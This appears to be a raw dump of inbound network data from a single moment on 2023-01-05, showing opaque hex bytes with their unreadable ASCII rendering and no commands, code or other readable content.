                                                                                                                                                                                    2023-01-05 07:58:37 UTC12497INData Raw: af f5 db ca 3a 56 d7 6d 12 e6 41 2a 80 cc 7e 0d 62 6e 63 ef 01 d0 93 6b 51 ef e4 c4 92 6c ef 78 41 22 2e b9 ba 48 09 5a cc 58 72 90 21 1b 01 8f ac e0 84 b7 f4 db 30 2f ad bc 37 b7 be 25 65 39 60 f8 85 c1 69 b8 fa c2 de ad 50 1e 0b 56 64 05 7a 6e dd 05 6b b0 8f 0d f4 2a 96 cd bd 94 0c 08 3c 9a 8c e5 29 d5 f3 4c 15 f6 59 01 8a 9c d1 80 2f c8 58 a0 a2 b2 70 5d 06 3d a6 00 55 56 c4 db 27 b1 8c e8 1c 24 95 8c 66 1e 87 c5 db e2 b2 1a b0 95 92 68 df bb fd 7e 0b 12 cd 5d 7f 4a 97 fb 77 b5 cc d2 93 7a 52 5a e6 58 f7 b1 a9 14 d9 6d af 6b dd 1f 64 2a e1 d8 a2 fa 63 b6 ca 63 3c 04 19 27 20 db cb 11 c0 d5 85 98 56 0e ff cf cf 36 ce bc f9 07 fc 8b c2 f5 49 c5 62 73 50 01 60 06 26 d6 d7 71 06 6b 39 bd 8a ba 63 d1 31 40 75 00 f9 3e fc 0c 4b d8 f9 4f cd 0a 61 c6 f2 33 a7
                                                                                                                                                                                    Data Ascii: :VmA*~bnckQlxA".HZXr!0/7%e9`iPVdznk*<)LY/Xp]=UV'$fh~]JwzRZXmkd*cc<' V6IbsP`&qk9c1@u>KOa3
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12513INData Raw: 08 7c 49 b7 4f 7a f4 a6 22 70 35 01 cc f4 05 60 54 2b 95 a6 3d 93 24 ce ce d6 1c 2c 14 92 66 f3 29 a5 77 0e d3 9a 86 21 81 82 b9 15 84 3a 07 1c d0 ec 7f b7 c6 91 f8 68 91 e8 ac 9b b7 67 85 23 f8 42 6f 4b 9c 64 37 09 c0 db 3f 2b 91 8f e4 48 05 2a 9a 10 e6 44 3d e9 07 f5 a1 b3 8a 53 42 b3 24 78 d7 24 0b f3 92 49 1f 02 7e 08 85 46 2a b9 85 c8 17 b9 99 27 26 5b 3f d0 ae 4e c2 c9 b0 7e ab 49 7e ce 1a 63 19 57 bd c4 d9 8b d4 b8 c0 f6 a5 35 05 0a 1e 97 39 ed 8f ed 0b 22 94 40 d9 a6 e2 2c 72 ca fa df fc a4 20 fe 72 ec a6 64 9c de 34 e1 3b 8c ff 2e 9e 6f 29 22 98 63 2c cb 11 a1 ae 82 c3 b2 5c 1d 91 73 34 a6 f0 ef 6b 3e 5b 43 87 d1 0b 65 90 fb 8e 9a 5d 5f 29 54 db f4 aa 56 6c 81 a3 a0 e9 88 ea 22 51 c8 d2 7d 6b be 0a 68 ea 1c 9b 09 87 b3 16 a5 c4 67 46 b3 cd 59 15
                                                                                                                                                                                    Data Ascii: |IOz"p5`T+=$,f)w!:hg#BoKd7?+H*D=SB$x$I~F*'&[?N~I~cW59"@,r rd4;.o)"c,\s4k>[Ce]_)TVl"Q}khgFY
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12529INData Raw: f4 f4 27 ee 50 99 8b 74 0e 4a 2f bf 49 7a ed fc c7 db b3 76 83 ba ab d7 ea c9 e3 07 b3 4f 59 09 9a a3 62 1b e4 fe 1f aa 8b e0 77 90 92 79 b3 87 99 83 13 21 8f 73 94 d8 cb 84 83 9a b0 69 44 09 f8 4c c9 8b 18 d0 72 9c 63 94 6c 44 ef b2 b1 66 f2 0d 25 9e 0e 49 f1 1a a6 59 4f 13 c4 51 08 2e 01 00 81 12 e5 97 6b 8d 9e 62 0f 60 4c 91 b3 6b 74 3d 4b a2 bc cd 30 54 d7 14 3d ce 6f d8 3a 0f 99 f4 33 95 d1 db 51 24 ca 3d 04 7f 0d f8 b1 b8 35 cc 60 b2 7b f6 7d f3 e4 cd 06 88 ca 3b 6f 18 00 06 4c ca b4 aa 0b e0 8b e4 6d ea 7f 33 61 d4 6a d6 6d 4e 60 49 66 04 a3 fc 7a c7 c3 cd 38 ff ab f2 bf 3a 37 fa 99 25 e6 3f c8 49 3d 42 1a e1 e6 05 3b 60 af f8 77 6e fb 25 67 94 1e e0 92 81 6c 6c e2 4e 14 62 6a 7a b7 9e 69 2d 2c 2c ff bf 33 dc 7e e6 3c 6a dd c7 c4 c2 1d 9b 1b a5 b0
                                                                                                                                                                                    Data Ascii: 'PtJ/IzvOYbwy!siDLrclDf%IYOQ.kb`Lkt=K0T=o:3Q$=5`{};oLm3ajmN`Ifz8:7%?I=B;`wn%gllNbjzi-,,3~<j
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12545INData Raw: 47 d9 cc eb d7 2d b8 2c 20 0e 02 94 da 95 8f 2e 9c 64 5e 61 7e 04 3c ee ce 08 bd f5 32 f8 08 e5 7c 5c 42 33 d8 5e 3a 2e e4 83 9c e3 3b 7c bf 1b 7e 7f 4c c1 cc 55 37 90 fc f6 84 0d ef 65 c2 87 6d ac f7 3f fb dd 4b a2 be a5 8f 99 2c 18 09 ed 01 bc 43 71 87 e3 f8 ff cb 17 61 1f 66 ce 37 7e 25 9c 0d 81 7d 0f e7 27 18 9c 60 88 30 8c 06 d2 0e 77 b1 22 c8 b2 d8 27 3d bb 1c 8b 57 a2 f9 69 34 d7 db 2f 9c 27 e3 ef 02 11 09 b6 c7 78 92 b8 29 fc eb 03 04 8d c8 8d 56 9b 57 1d e1 3b 68 0c ed 47 ac 40 0b 47 f2 fb c2 09 3d 30 1f 86 ea ef c1 d3 68 40 09 86 2f 92 2a 2b 22 58 1a 8b 8e 2e b9 c7 2f 11 75 e1 af 5e 3f 37 7a c9 30 a0 bc 30 92 0b 5b 6c 19 d6 86 1d dd e8 5e bf 4a 77 5f 86 69 d5 93 55 61 f5 bb 24 08 9f 3c fe fe 7f 90 ca 8a e9 44 68 0a 3c 8f fc 4b 3e ce 69 5a d6 41
                                                                                                                                                                                    Data Ascii: G-, .d^a~<2|\B3^:.;|~LU7em?K,Cqaf7~%}'`0w"'=Wi4/'x)VW;hG@G=0h@/*+"X./u^?7z00[l^Jw_iUa$<Dh<K>iZA
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12561INData Raw: 2d 2a 49 ed b3 c4 e6 7f a9 58 c5 ec 96 65 9d 3d 70 9a 3e b9 f3 1a 07 a0 2b a7 a1 06 26 79 9e 4a 1b 80 2d 36 52 6d 37 4a 49 34 8e 4b 4e de a8 fa 6b 9d 78 b8 79 7f a8 8b 83 67 60 31 22 f7 45 31 48 a0 f1 40 08 8a 58 5d cb 1f 29 09 9c 06 2e e0 78 9d 33 39 72 6a 3b fc bf ee 23 59 03 d6 81 c8 fc 46 c4 7f 36 f8 84 a5 2f 54 c1 d2 7e 58 6b e5 b0 81 f8 24 4b e6 12 e7 2e ef 57 c6 10 ff 62 ce b2 57 eb 30 bf 28 8d 7c 8c 84 68 63 cf 5e 4d 2a a4 82 16 8a da 6d 26 b0 c9 0b be c6 e0 12 b6 95 0f b7 72 93 c3 6d 00 4c 0f fd 2c d3 76 ac 12 d5 52 f1 0b 90 a0 5c 0c 63 9e 40 2d ce 52 14 c7 3d 31 05 3d 08 2c eb 41 38 c0 54 1e 6b 35 a5 0f 03 7e f0 71 3c 86 6e ea 31 d7 28 4e 44 89 c2 bc ca f5 29 b6 4c 9c c0 b8 9f f9 db f0 cb 91 fc 29 ed d5 93 4b 0f d4 b7 ff dc 2b f4 ad 63 b2 68 a9
                                                                                                                                                                                    Data Ascii: -*IXe=p>+&yJ-6Rm7JI4KNkxyg`1"E1H@X]).x39rj;#YF6/T~Xk$K.WbW0(|hc^M*m&rmL,vR\c@-R=1=,A8Tk5~q<n1(ND)L)K+ch
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12577INData Raw: b0 28 07 68 4a 3c 30 dc 31 0f 81 c4 94 d4 2c e9 5a 31 92 0b 1d 97 23 3a 5a dd ff c8 f1 7c 03 27 51 50 4a 84 c0 a0 63 84 31 5d fe 5e 40 84 95 5b e6 17 72 6c 58 8d fc 1a 51 e8 51 ca 2e d0 08 c8 75 1e 71 27 51 0c 01 47 e2 f1 1a e0 6f 21 f4 1b a7 c2 71 b4 31 af e3 78 42 5f 93 56 c1 93 32 d0 9a af 96 4d 4d 50 a9 08 48 bd a2 43 0c f8 dc 20 35 42 9e ce bd 92 f2 ac 65 06 8a a4 e5 c6 29 5d 2e b7 98 ac 0c d2 fb 33 62 a6 85 35 61 e3 32 48 58 1f 11 84 b6 e7 56 cd a7 29 ce e1 ce 5c cf f4 a6 a4 ed ee 23 1a 16 00 f4 c3 3e c0 5f df c9 b0 04 33 76 79 cb 42 97 06 d1 ca 1b bc 5a 76 76 e3 fc 37 d9 90 41 57 25 fa 36 22 83 40 5e 23 df 40 6b 59 b9 e7 ec d3 18 8b 8d 37 ae d4 eb ed f4 30 49 a4 56 ec c3 1b 5a 26 f6 d4 8e 3f b1 f5 32 9e 19 6f 44 4a 21 61 1b 9f d5 95 ed 1e b1 50 4b
                                                                                                                                                                                    Data Ascii: (hJ<01,Z1#:Z|'QPJc1]^@[rlXQQ.uq'QGo!q1xB_V2MMPHC 5Be)].3b5a2HXV)\#>_3vyBZvv7AW%6"@^#@kY70IVZ&?2oDJ!aPK
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12593INData Raw: 78 60 9a ac fb 13 8c 6d 06 c4 ad af d3 44 f1 10 29 07 4e 7c 5a 08 47 bd cb f2 f8 70 ba af 58 e0 13 db ff da 67 58 09 c5 43 9d 59 6d c6 74 80 3f 51 f5 97 55 81 c6 13 95 38 33 af 4a bf 11 29 6b cd e2 7e b7 d7 d5 bb ae 4a eb c8 e1 eb 98 b1 eb 4e 84 59 e5 f0 a8 6f 2d bf 6c 33 88 78 76 3d f4 57 7a 59 25 56 2c 2c e2 33 0a 75 53 2d cc 6e 63 6d b5 7c 99 8c 6a 47 fc 6b 90 a7 58 09 f3 5f d7 c6 c5 75 aa cf 24 b3 7e 90 eb 56 4e 98 0b 6e 08 2e 3b af 72 db 6a 5d f7 cf 2b fa 5c e5 49 09 80 73 84 1f 5d da 96 b6 a9 c3 4d 81 5d 6a 06 4f df 83 55 c5 85 f4 04 c2 65 32 80 53 aa 75 e9 9b 22 d6 5d b1 bc 4a bd f8 4a 20 e9 8e 80 3a 26 7f c6 31 f1 0f 34 ee c0 18 43 31 1a 14 3c 84 62 c7 d7 17 94 64 3d c8 90 ba cd 75 d1 75 66 2b 59 58 f5 ce 3d 2d dd 32 1c 18 f8 ee 46 de 52 31 19 37
                                                                                                                                                                                    Data Ascii: x`mD)N|ZGpXgXCYmt?QU83J)k~JNYo-l3xv=WzY%V,,3uS-ncm|jGkX_u$~VNn.;rj]+\Is]M]jOUe2Su"]JJ :&14C1<bd=uuf+YX=-2FR17
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12609INData Raw: f6 d3 b7 c3 91 05 ff 3d 9d 94 8c 33 f8 ed 55 04 ea 98 32 86 94 34 ba 45 6c f0 3e a8 e1 f5 d9 5b a6 96 0d 35 9a 2b 50 7b 8f 47 1e 12 cb 41 01 d9 02 e4 9a eb 3c 65 d6 f5 b1 6b 12 02 7a b8 56 66 14 3c cf ab 4a 4f 5c 5a ee 12 9a f0 2e 7b 30 aa 6c fe 4b 4a c1 e2 a7 1a f6 09 95 11 91 bc e8 49 2a 4f a1 88 3f 95 1f fa e8 07 be af 4d 40 ec 6c 08 5c b4 0b b4 e8 cb b3 a3 93 f3 61 b3 7d 58 50 a3 19 ea 13 2b 5f 73 bd 65 4b 7b b4 f7 0a a1 8c c1 a4 8e a2 a9 7d b9 8e c9 4e 79 77 42 c6 1a 2a cb 86 b4 9f ed 5b 10 fb 2a 22 19 52 8e cd 72 dd c8 0e 9f 75 d6 43 2c ca 7c 53 e7 9f 86 20 44 45 11 4b 53 a8 ab 09 dc a5 14 0d ce 02 24 fa 44 37 b9 be 86 04 dd 75 11 27 20 85 54 8f e3 dc f7 25 c1 c0 a9 af 23 94 3c cd 2c 5e 16 86 88 3d 2e 4f 9a c6 db 18 fb 84 cf 53 ff 31 40 dd 58 64 79
                                                                                                                                                                                    Data Ascii: =3U24El>[5+P{GA<ekzVf<JO\Z.{0lKJI*O?M@l\a}XP+_seK{}NywB*[*"RruC,|S DEKS$D7u' T%#<,^=.OS1@Xdy
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12625INData Raw: af 69 e4 36 95 62 0b 31 ee 89 1d 4d 2b 21 3b a6 12 a5 e5 6b 45 39 46 7b fc 55 96 22 80 d6 5b 5a 61 78 de f8 d4 dc 99 04 84 e8 97 e4 e6 ab b7 21 c2 39 64 b5 bf 39 9c a5 05 4f 9a f5 e6 28 2d 65 11 7d 1c d5 ba 76 e2 d0 b7 b3 ed a4 02 44 ad de 0e 72 f4 b1 e3 75 1c 97 27 d8 0b bc 11 3d 28 e1 6b ad 0f eb a6 c1 29 37 95 08 73 74 cf b3 7e 41 4b 74 c9 76 f5 b8 d5 fa c6 4c 2e 29 12 b9 60 05 16 8a df 6e 63 ef 28 f9 e8 09 2f 7c e0 ae 82 28 84 5d 48 d7 db f9 17 03 08 f9 0c 27 f5 99 a0 8d f1 0e 39 ee eb d1 9e 4c 15 a3 da 2a b6 3e 2d 95 02 37 35 30 d6 08 bd d0 62 1b ea a5 b1 e2 49 e8 df 90 ef f6 7a 05 dc a7 2b 65 7a 37 b3 fc 7e 31 2f 49 f1 af 16 27 a2 36 28 db 7b dc 02 bc e2 3f 98 30 f9 76 50 6d 69 7b 09 59 47 cb 4a 47 f6 51 a0 95 d6 a0 82 3c 75 05 0f 11 e0 ed c1 0e 6f
                                                                                                                                                                                    Data Ascii: i6b1M+!;kE9F{U"[Zax!9d9O(-e}vDru'=(k)7st~AKtvL.)`nc(/|(]H'9L*>-750bIz+ez7~1/I'6({?0vPmi{YGJGQ<uo
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12641INData Raw: 7d f7 b4 82 04 0b 41 9a 41 1f ac 98 bf 78 c6 fc 76 6c 6f b0 a0 d3 0a 6f 90 56 3d 56 09 c6 af 38 31 e8 fb 66 15 58 09 95 1a a8 67 f1 99 fa c9 54 c1 df 11 e0 c1 07 fe d4 14 91 6c 56 76 8a 3e d4 f9 cf ed 0d 71 62 3e eb 31 af 14 2f 9b cd 01 dd 5a ad 87 15 87 4a 70 f7 5a 04 b9 99 96 6d ef 40 d9 9c 4f 8b 3e d2 a8 44 76 44 e4 33 49 b5 bd 4b f5 38 38 f8 4d 33 4f c0 ce c5 21 0b d1 50 df e3 c3 59 b6 c3 da 92 0e b1 8b e4 bc fc da ae 66 c4 c1 4d 24 a3 c3 9d b1 06 32 63 d1 c9 d5 2c d4 cd b4 ea 09 ec 37 c1 e0 8f dc cb c0 f9 02 47 c9 58 19 b1 70 1f 39 c5 cb a0 05 35 2a 91 32 6a f8 19 0d 13 c5 51 43 cf 21 cc d3 9e f4 ef 1d fd 4a 0e 9f a3 5d 4f 9c 7a f3 66 b5 93 9a ac 28 20 13 0d 6c d5 c5 d8 37 77 c1 66 79 b0 69 2e 13 6e 89 b5 90 59 b4 00 07 af 19 e3 38 4e 5e 5e 3b 53 3b
                                                                                                                                                                                    Data Ascii: }AAxvlooV=V81fXgTlVv>qb>1/ZJpZm@O>DvD3IK88M3O!PYfM$2c,7GXp95*2jQC!J]Ozf( l7wfyi.nY8N^^;S;
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12657INData Raw: aa 40 04 ec 07 33 d5 24 21 04 ef 9e 02 07 2f f4 74 04 c9 f1 07 5c 3e 41 96 81 27 17 0c d2 1b e2 b8 e1 fd 95 1a 34 45 5f 20 5e 40 ee 2b 6f 73 b2 c8 c4 b8 b4 80 8b 35 97 a1 b1 fe aa 07 3e d4 9c 6a 9a f4 a9 c8 9c 2f a5 29 c5 ee 81 a9 e3 d0 3b 7d c8 47 92 6e 3d 95 88 5f 67 0e 98 dc ca a9 97 81 60 7e 50 7f 76 66 4c 28 8c 3d 20 e7 ed 89 b4 70 c1 84 02 b1 6b dc 24 0f 32 56 a6 46 82 2d 50 bd c9 b2 81 b9 17 a4 3c eb fa 0a 5f 3d c7 87 cf 6f 92 99 b5 b4 59 13 cd d3 bc 92 01 e5 64 77 1f 31 e9 71 7a db 73 34 28 fa f0 e3 bc dd 3f 45 be 6f 9a 59 5d 85 43 f4 56 80 a4 cc eb 98 ba 39 a7 81 5f 80 8d 35 40 da 60 32 22 94 62 7d e2 89 95 da b7 31 e4 b7 af 25 7f a0 03 e2 62 54 c1 3d 47 a3 13 53 e7 9d ee 92 10 d7 74 20 a0 64 57 0f 39 d5 b4 43 4a 2e 37 44 7c 5a bd 1d 23 ea 8f 57
                                                                                                                                                                                    Data Ascii: @3$!/t\>A'4E_ ^@+os5>j/);}Gn=_g`~PvfL(= pk$2VF-P<_=oYdw1qzs4(?EoY]CV9_5@`2"b}1%bT=GSt dW9CJ.7D|Z#W
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12673INData Raw: e6 2d 57 dd ac f8 71 81 af d0 06 d2 c7 df e7 dc ec b2 47 bf 0a b4 2b 87 46 80 25 e5 63 9e c3 88 01 06 22 90 e6 3f 0b 91 18 95 d1 7d d8 8d 75 f4 50 7f dd ad f8 8a df 07 16 3c 3f 44 ca 6f 5f 59 9a ed 07 1d 05 34 e5 38 12 ba 72 9d 37 f2 46 82 e9 e5 a7 13 96 c0 93 00 11 c7 1b 81 e5 04 4a f8 21 41 3d 70 f9 5f e6 11 e9 b6 6a c8 93 c4 e4 f5 7e 7a 10 2d 48 72 53 d2 0f 4c 41 a7 07 42 67 cb 10 72 07 85 a5 c6 36 b1 84 82 73 c8 22 8e b3 a5 46 af 95 25 70 66 ad 2d 80 2a d5 b0 cd b2 1b 55 1f b5 18 01 31 59 c3 11 8f 65 e4 b5 f1 81 bf e1 a0 e6 76 3f f4 7c 93 f9 65 f7 e3 9b 81 7e 45 d1 a6 bb 49 31 6d b6 a1 79 97 7f d9 78 c2 d6 15 73 1e 26 3b 46 8f d0 fe 15 3d 3a fa 6a f2 1a 98 cf 2f e1 45 0b 4d 9e 60 2a 80 da 42 10 d1 b4 29 d1 b0 0e 7b a2 1a 1a 42 f4 6a cf 44 db fc d3 4b
                                                                                                                                                                                    Data Ascii: -WqG+F%c"?}uP<?Do_Y48r7FJ!A=p_j~z-HrSLABgr6s"F%pf-*U1Yev?|e~EI1myxs&;F=:j/EM`*B){BjDK
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12689INData Raw: 16 84 4b f5 07 a9 1b c3 4a 28 29 a8 4c db 54 99 03 3c 23 3f 24 5d 2e 62 b7 ad af c7 eb 52 9d d0 63 00 70 c0 a6 c8 72 65 c2 83 0b ef 51 53 e0 84 99 3a 0e ff a5 0d 29 93 fc f8 77 75 7c a4 81 fc 55 be 1f 2c 95 9a e7 ce d0 0b 09 08 4b ff 63 f5 4f 2d db f1 43 23 71 ea 98 5a 6d 1f bf e4 e8 c7 13 c0 68 db d9 5d 16 18 b6 7d da 6d d9 b4 7c c6 75 fa ee ad a4 0c 2b 9b 96 10 a6 07 0d 62 6f 58 99 c4 0b 9a 87 e9 51 d4 bf 15 b1 4b 09 ee 45 c3 e1 41 5e c8 4f 56 e0 00 f1 3c ae 0e 28 c7 58 0c bd 54 f5 3c cf c2 8c 10 ab c9 62 02 5e c3 0a b3 bd c4 4b f8 dc 2a 77 c3 83 64 9a dd b3 90 fe 27 95 3c 04 23 e0 dc 49 5b c6 09 57 c3 f6 4f 0d 3b a1 e7 76 60 54 c3 a5 2f 1c 3c f2 53 4f c3 9c 3c 2d 89 4f d2 0e 1d d1 f7 4f c3 f6 c9 97 12 42 9b 90 c5 85 74 4b f5 48 ce 9d 5a 79 06 a1 25 e3
                                                                                                                                                                                    Data Ascii: KJ()LT<#?$].bRcpreQS:)wu|U,KcO-C#qZmh]}m|u+boXQKEA^OV<(XT<b^K*wd'<#I[WO;v`T/<SO<-OOBtKHZy%
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12705INData Raw: 55 bc fe 52 1d 75 90 77 81 50 e0 9c 07 93 1b d9 21 87 19 9b aa e0 f9 84 fd c4 43 77 24 e7 76 a4 11 42 da 81 7a 88 3a 72 3c bf e2 91 fc ed e0 77 f1 da 03 7e 01 16 0c b1 dd 89 32 0e 80 f6 07 fc 4a 13 fc 75 ae 2b 7f 50 f2 43 de 55 97 8a 2c 88 61 61 15 db 85 96 df 75 37 82 50 59 b9 d7 0a 7b 0f 37 bc 32 ad 39 c3 18 da d7 1e 76 21 1f b5 37 a3 5d e3 79 0b 59 4b e9 56 dd 4a b4 1c 88 50 3d ab 0e e0 3c fe b5 7e e3 fe 82 48 64 72 cf 26 58 3d dc 00 cd 01 fa d4 30 d5 26 49 25 bd 12 d6 ed 47 c9 35 1a 72 65 b8 e2 ff 68 22 33 cd 59 0b 96 41 5d 6d 58 fa cc 67 63 69 c6 a6 72 37 a9 9f 31 1f fd 84 4b 59 bd cb 47 e5 cc 03 2b 27 ea b9 42 4a 62 19 34 df ff 27 7c 47 bd 1a 5e 58 34 6a a5 65 8f 44 4c d6 c5 da cc 0c 00 51 b3 8d ef ca 7b 97 bf c8 09 7b ea 04 96 00 0c 66 6e 55 7b 7e
                                                                                                                                                                                    Data Ascii: URuwP!Cw$vBz:r<w~2Ju+PCU,aau7PY{729v!7]yYKVJP=<~Hdr&X=0&I%G5reh"3YA]mXgcir71KYG+'BJb4'|G^X4jeDLQ{{fnU{~
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12721INData Raw: aa 9f 79 9f d3 bd 73 a7 3d bc a3 a6 9b 43 cb 78 9d c3 c7 bf 61 83 83 58 34 c5 c5 19 ec 43 2c 91 dd ea ce 37 2e 94 35 bc c4 79 f1 40 de bf da 5b 26 44 83 c6 72 9e 72 98 ca 70 f1 bb 60 a8 ac 53 8e 6a 9c 97 2a bc 69 c1 c9 ac c8 53 62 98 34 44 5a 95 04 86 31 2a e3 95 91 bb 3f b9 e2 0e d2 10 2a c1 35 bb 7c 9e 80 0b 27 97 84 90 39 33 21 e1 3f 84 01 11 fc 0d cb 8a 00 4d ae ac fd d3 76 60 31 18 cc c1 b1 83 fb ac d4 51 67 5f ee d0 69 eb ce 76 54 9b 7f 1d c7 e1 21 b3 13 93 e1 0b 9c c0 96 f9 1b f4 d0 51 9b b3 0c 43 6f 80 83 43 03 cb 20 27 23 f8 19 1d ef bc 5c 6c ff 2f 09 f0 b1 b3 c9 eb 8e ce e5 48 03 56 df 6b dd 61 eb 63 3c 32 c5 60 6b b1 c8 9d 07 7c e0 7f e9 4f 5e 6b c0 62 29 8e 17 c4 bc dd 6c 10 3b a0 00 f7 82 65 01 cd b7 9b 2c 62 2f c6 20 85 c0 63 ec 4c 9b c4 03
                                                                                                                                                                                    Data Ascii: ys=CxaX4C,7.5y@[&Drrp`Sj*iSb4DZ1*?*5|'93!?Mv`1Qg_ivT!QCoC '#\l/HVkac<2`k|O^kb)l;e,b/ cL
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12737INData Raw: 13 10 49 f2 d1 2a 6a f5 a5 ef 15 ea 47 f1 c5 3f c7 5a d5 f5 79 ff fe e5 e1 15 23 db 69 fc c6 83 65 68 1c c2 d2 f8 d9 fb 5d 12 77 68 ce 51 5d 81 da 90 2d 19 70 cd 3d 4a 73 a3 b0 46 31 f3 3b 43 77 64 19 48 72 78 d4 43 62 12 7f 49 68 c0 8b 46 77 43 dd b5 f1 01 0f 5b c0 4c 5e 2e 19 bc 69 55 10 43 b3 0b 5e 0c 23 04 b5 36 1b 3a 31 bc 91 4e 8a 90 9e 6c 66 a7 5b 43 67 69 07 98 f4 9d 8a 09 6f 14 17 36 01 13 99 5d 33 96 b2 1b 63 0a 3c 58 c0 9e 6b 24 71 f4 a2 02 3b 27 90 66 e4 5b ca 7b c7 2c 45 ba 2b 2f 57 f7 1b 53 d6 ce dd d7 cb ec 3f 7b 16 7c 15 b0 13 f8 2f 87 77 02 7b 2a 6e 08 df 16 8a 67 1f 9a 88 f6 c1 dd 14 8f 76 21 4b 84 f3 fc c1 21 67 fc 5e b5 20 f7 e0 1b ad ff 8d ff cd 4b 7d 50 90 a8 6b 99 c3 dd 3f 6b ac a5 6a 65 bb d9 29 22 fb e8 45 54 bd a5 af 75 c1 dd a6
                                                                                                                                                                                    Data Ascii: I*jG?Zy#ieh]whQ]-p=JsF1;CwdHrxCbIhFwC[L^.iUC^#6:1Nlf[Cgio6]3c<Xk$q;'f[{,E+/WS?{|/w{*ngv!K!g^ K}Pk?kje)"ETu
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12753INData Raw: 1f ae ee 55 86 04 5f ed 66 f9 83 51 f7 99 76 32 d4 ab 14 17 9a 01 75 00 77 40 a1 14 79 ab e4 e0 bf 40 0e be f9 52 64 c2 c7 52 cf ff 8a ff d8 97 17 8a 98 46 69 fd ed a9 3e 70 02 60 25 47 a6 54 c6 54 d0 51 9d be 9a 90 b2 7e 98 ef bb 4f 56 62 ff b0 b7 4c 38 97 bd 85 87 54 cf 08 a6 05 68 29 64 27 0d 18 8d 37 c5 31 88 9a f5 09 9a ba b5 ab 27 59 58 9a ef d5 36 c1 fa 11 7a ab f1 e7 7a a7 42 97 3e ca c7 1c f5 7e 89 01 fc 02 99 90 00 e4 94 09 a5 be b2 ff fa d4 7f 14 6e ef e0 2d 63 06 d9 5c cd 60 71 e1 fa 41 c4 ad 72 00 77 50 72 6a fa 15 2e 93 3c 75 98 c5 94 4d 68 eb 86 45 08 9b 66 60 f0 75 54 ea 78 9a ed 98 71 c4 40 85 51 ea 60 8d 95 9f 7d ea ca b0 94 14 a0 9b 2c 65 9d 69 37 cf e8 15 06 43 80 ec 64 75 07 59 1e ea 5e 2a 7d 12 9e 4a ae 61 e7 15 76 33 46 7d 88 91 46
                                                                                                                                                                                    Data Ascii: U_fQv2uw@y@RdRFi>p`%GTTQ~OVbL8Th)d'71'YX6zzB>~n-c\`qArwPrj.<uMhEf`uTxq@Q`},ei7CduY^*}Jav3F}F
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12769INData Raw: c9 bb 26 a6 80 35 1f 47 46 1b a1 01 ee aa 41 44 c1 49 b0 7f e6 ad 00 5c 2d fe ce ff 8a 54 a0 5c 60 d3 c0 60 c0 d5 9b ad 9a 7a 35 a2 79 6d 8b b5 49 b4 0c 31 c3 46 c1 e5 8d ff cd ff b0 76 27 40 79 2a 47 c7 e2 bf ea e0 4f f3 6c 7e 3b 44 12 5c e2 be f2 90 d3 5e 32 fe 8c ff 88 cb 1d 4d 89 38 67 6e 53 aa 11 91 26 85 5b b8 67 8f 6b 8b 87 f6 ab c0 c1 a5 28 1a 88 ff 9b ff bb 75 9f bf 7c 3b d5 33 82 57 b4 1f b2 ec 6e d4 2c 44 0f a5 a0 92 ea c1 c4 58 38 fe 8f ff 97 e5 8f 53 73 82 9f 40 ba d5 cd d4 85 7a 6e 27 00 96 99 1c aa 0c 94 f7 a5 21 26 1a ce ff 8a ff e6 b8 2a 44 49 6e 41 b8 d9 2c 7a 2d 00 bc 27 73 2f 70 75 89 d1 f6 d2 43 83 72 cd ac 71 ac 4f 92 2a 40 e7 6f c3 b7 cc 31 78 48 05 bc 10 3d d9 05 36 8b f7 c5 dc 43 b3 7d fa af 30 32 e1 0a 90 bb f1 82 23 71 d8 0d f9
                                                                                                                                                                                    Data Ascii: &5GFADI\-T\``z5ymI1Fv'@y*GOl~;D\^2M8gnS&[gk(u|;3Wn,DX8Ss@zn'!&*DInA,z-'s/puCrqO*@o1xH=6C}02#q
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12785INData Raw: 2c 2a 99 8a 3d 24 5c 2b 0d 52 b1 3d 2a 52 76 00 64 10 91 4c b1 14 a5 fd 7b 7c 82 7a 96 9d f4 15 93 95 c5 f5 63 43 fd 0b 06 ea ed dc 7c 0b 9b 94 5f 33 e9 15 30 45 17 64 9f 17 67 c9 fd 15 3c b8 e4 62 88 48 37 b6 f6 15 53 73 94 e2 25 26 8c 0a 13 ea bf 01 ee 9b 27 a6 33 b1 9d 14 42 c5 79 6c 9d 5b f9 1f 66 eb 42 b3 56 82 67 4e 0b 27 1e ea db cc 17 15 f3 e9 59 0f 96 71 e9 11 28 f9 ff 87 94 bf 37 e5 63 62 df fb e9 97 d0 52 8d 04 e3 81 3e 04 76 c2 d5 b0 77 6b c2 58 c0 fb ed 5c e4 a0 77 d8 05 fe 85 04 7d 6e 78 4c 9e 21 4b 03 73 04 ef c2 65 bf 6e 24 5a e2 28 fa f9 ef 13 4f 73 2d 3d a7 c0 05 88 34 e7 ab 8b 46 9c b5 23 fa 9a 8e 6d 42 71 12 bd 87 df 06 4f 6b c3 14 62 00 70 80 0b 84 d6 9f b8 09 be 46 8c f6 ac f4 20 45 5c 81 c3 14 62 00 70 80 a4 02 d6 ff b4 21 e7 02 cc
                                                                                                                                                                                    Data Ascii: ,*=$\+R=*RvdL{|zcC|_30Edg<bH7Ss%&'3Byl[fBVgN'Yq(7cbR>vwkX\w}nxL!Ksen$Z(Os-=4F#mBqOkbpF E\bp!
